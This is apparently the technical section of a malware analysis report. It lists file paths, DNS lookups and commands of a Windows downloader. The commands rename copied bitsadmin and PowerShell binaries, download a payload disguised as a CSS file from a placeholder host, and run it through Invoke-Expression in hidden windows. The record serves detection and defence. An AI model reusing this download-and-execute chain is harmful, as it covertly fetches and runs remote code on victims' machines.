Technical Information
- '%ALLUSERSPROFILE%\lrncnaoin.exe' /transfer QhRdBa /download https://example.com %APPDATA%\uk.css
- '%ALLUSERSPROFILE%\zhljiagc.exe' -c &{$PK=gc %APPDATA%\uk.css| Out-String; Invoke-Expression $PK }
- %ALLUSERSPROFILE%\zhljiagc.exe
- %ALLUSERSPROFILE%\lrncnaoin.exe
- %APPDATA%\bitb1d1.tmp
- %APPDATA%\bitb1d1.tmp
- from %APPDATA%\bitb1d1.tmp to %APPDATA%\uk.css
- 'ex##ple.com':443
- DNS ASK ex##ple.com
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\lRnCNAO*.exe' (with hidden window)
- '%ALLUSERSPROFILE%\lrncnaoin.exe' /transfer QhRdBa /download https://example.com %APPDATA%\uk.css' (with hidden window)
- '%ALLUSERSPROFILE%\zhljiagc.exe' -c &{$PK=gc %APPDATA%\uk.css| Out-String; Invoke-Expression $PK }' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\lRnCNAO*.exe